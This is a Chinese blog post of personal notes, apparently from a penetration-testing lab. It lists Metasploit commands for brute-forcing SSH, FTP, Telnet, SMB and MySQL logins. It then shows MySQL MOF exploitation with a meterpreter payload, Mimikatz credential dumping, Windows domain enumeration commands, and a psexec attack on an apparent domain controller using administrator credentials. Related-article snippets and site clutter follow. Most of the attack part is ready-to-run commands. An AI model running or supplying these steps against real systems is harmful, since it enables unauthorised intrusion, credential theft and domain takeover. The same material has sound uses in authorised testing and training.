msf+mysql+弱口令爆破_msf各种弱口令爆破

最新推荐文章于 2022-11-28 13:31:48 发布
最新推荐文章于 2022-11-28 13:31:48 发布
阅读量620 收藏 3
点赞数
文章标签: msf+mysql+弱口令爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32001071/article/details/113220516
版权
本文详细记录了使用Metasploit进行弱口令爆破的过程,包括SSH、FTP、Telnet、SMB和MySQL的爆破方法。此外,还介绍了如何利用Mof模块获取权限,以及使用Mimikatz导出域内用户信息和反弹Shell的相关操作。
摘要由CSDN通过智能技术生成

Msf:

写的很乱 记录下msf各个爆破弱口令的模块

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用扫描模块

use scanner/portscan/tcp

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login

爆破smb

auxiliary/scanner/smb/smb_login

爆破Mysql

use scanner/mysql/mysql_login

msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt

PASS_FILE => /root/passlist.txt

使用mof模块进行权限获取

use windows/mysql/mysql_mof

msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456

PASSWORD => 123456

msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3

rhost => 10.10.1.3

msf exploit(windows/mysql/mysql_mof) > set USERNAME root

USERNAME => root

msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/mysql/mysql_mof) > exploit

Mimikatz导出hash

meterpreter > load mimikatz

meterpreter > kerberos

一些域内的命令

查看域

net view /domain

查看当前域中的计算机

net view

查看CORP域中的计算机

net view /domain:CORP

Ping计算机名可以得到IP

ping Wangsong-PC

获取所有域的用户列表

net user /domain

获取域用户组信息

net group /domain

获取当前域管理员信息

net group "domain admins" /domain

查看域时间及域服务器的名字

net time /domain

net time /domain 就可以知道域的计算机名

WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控

net group "domain admins" /domain

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2

RHOST => 10.10.1.2

msf exploit(windows/smb/psexec) > set SMBDomain moonsec

SMBDomain => moonsec

msf exploit(windows/smb/psexec) > set SMBUser administrator

SMBUser => administrator

msf exploit(windows/smb/psexec) > set SMBPass xxx123456..

SMBPass => xxx123456..

msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/smb/psexec) > exploit

俞佳敏
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf+mysql+弱口令爆破_msf各种弱口令爆破 - osc_zfz9ur01的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_28938701的博客
01-19 162
Msf:写的很乱 记录下msf各个爆破弱口令的模块run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24使用arp_scanner模块 检测在线主机metasploit 增加路由route add 10.10.1.3 255.255.255.0 1使用扫描模块use scanner/portscan/tcp爆破sshMsf>use ...
SQL弱口令爆破
09-10
SQL弱口令爆破器 1433 自带密码生成器
3306 mysql弱口令源码_Metasploit扫描Mysql弱口令
weixin_36313588的博客
01-26 563
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3msf &g...
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 2110
mysql弱口令爆破工具 不仅仅是MySQL
爆破mysql口令
好好学习,天天向上
02-29 828
如何自动化检测Mysql弱口令,这里介绍介绍两种方式。 一、hydra hydra是一个口令爆破工具,kali系统自带。 hydra的使用帮助 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes....
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf攻击Mysql服务.docx
04-26
在网络安全领域,Metasploit Framework(MSF)是一个广泛使用的开源工具,它提供了各种模块来探测、攻击和利用系统漏洞。针对MySQL服务器的攻击是其中的一种常见场景,因为MySQL作为全球最流行的开源数据库管理系统...
VB-shujuku.rar_VB_vb MSF SHUJUKU
09-22
标题中的"VB-shujuku.rar_VB_vb MSF SHUJUKU"表明这是一个与Visual Basic(VB)相关的数据库教程或示例项目,其中可能包含如何利用VB与数据库进行交互的代码和实例。MSF(Microsoft Solutions Framework)在这里可能...
kali linux-msf-ssh爆破
10-13
### Kali Linux下的MSF与SSH爆破技巧详解 #### 一、背景介绍 随着网络安全威胁的日益增多,渗透测试成为保障系统安全的重要手段之一。Kali Linux是一款专门为渗透测试和安全审计设计的操作系统,内置了大量的安全...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
在标签中,"cmmb_msf"、"generic_play"、"cmmb_play"和"mfs_player"都直接指向了这个软件的核心功能。"cmmb_msf"表明软件与CMMB和MFS格式紧密相关;"generic_play"和"cmmb_play"指出了它作为一个通用的CMMB播放工具...
SQL弱口令利用工具(绿色、免费)
07-14
可以利用sql弱口令入侵SQL服务器上传、下载、删除任何文件以及新建SQL帐户、Windows帐户等的绿色免费小工具,连接成功后操作被入侵的电脑就像在自己电脑中一样自如。
超级弱口令检查工具
09-01
超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现密码弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 工具采用C#开发,需要安装.NET Framework 4.0,工具目前支持SSH、RDP、FTP、MySQL、SQLServer、Oracle、MongoDB、PostgreSQL、IMAP(支持SSL)、Memcached、Mongodb、POP3(支持SSL)、Redis、SMTP(支持SSL)、Telnet、VNC等服务的口令检查。
超级弱口令检测工具
02-28
转自github大佬shack2,写的弱口令检测工具,超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现密码弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。
3306 - 弱口令扫描工具
10-06
3306 - 弱口令扫描工具,3306 - 弱口令扫描工具, 弱口令扫描工具
mysql 弱口令暴力破解本地渗透测试
m0_46827210的博客
04-14 4774
文章目录环境配置主机数据库使用 Hydra 工具进行暴力破解使用 metsploit 暴力破解基本模块基本命令 环境配置 主机 靶机: 本地Linux服务器虚拟机 + phpstudy 攻击主机:本地 Kali 虚拟机 配置好网络让主机之间相互可以通信 数据库 数据库版本:mysql 5.5.62 开启 mysql 远程连接 ,否则攻击主机无法建立与靶机数据库连接 我是直接在小皮面板中开启 修改 mysql 最大错误连接数量,默认为 100 ,改为 1000, 方便暴力破解 ​
弱口令爆破 Tools-1
菜鸟不哭
09-07 1542
弱口令爆破工具 hydra 单个IP爆破还是比较好用的 windows / kali / linux windows 直接从github上进行下载,使用时双击.exe会闪退,需要在目录下新建一个cmd.bat的执行文件,里面的内容为:cmd.exe 。使用时直接双击cmd.bat即可。 linux 也是github上面下载压缩包,具体下载安装教程请自行百度,我直接就用kali了,所以这个不过多赘述。 kali 直接集成了此工具。使用参数网上大家搜索到的都是一样的,不会的参数help查询一下用法。 -
msf+mysql+弱口令爆破_内网渗透 | 手把手教你如何进行内网渗透
weixin_42347357的博客
01-27 1456
文章目录结构0x01 DMZ渗透首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。exp上面呢,就是利用exp将一句话写入当前目录的shellx.php中。get shell到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。0x02 跳板及内...
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的博客
11-23 3743
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
msf mysql_login
最新发布
06-27
`mysql_login` 是 Msf 中的一个模块,它主要用于利用 MySQL 安全漏洞来进行数据库登录的权限提升或获取敏感信息。 当你在 Msf 中使用 `mysql_login` 模块时,通常会执行以下步骤: 1. **扫描目标**:首先扫描目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值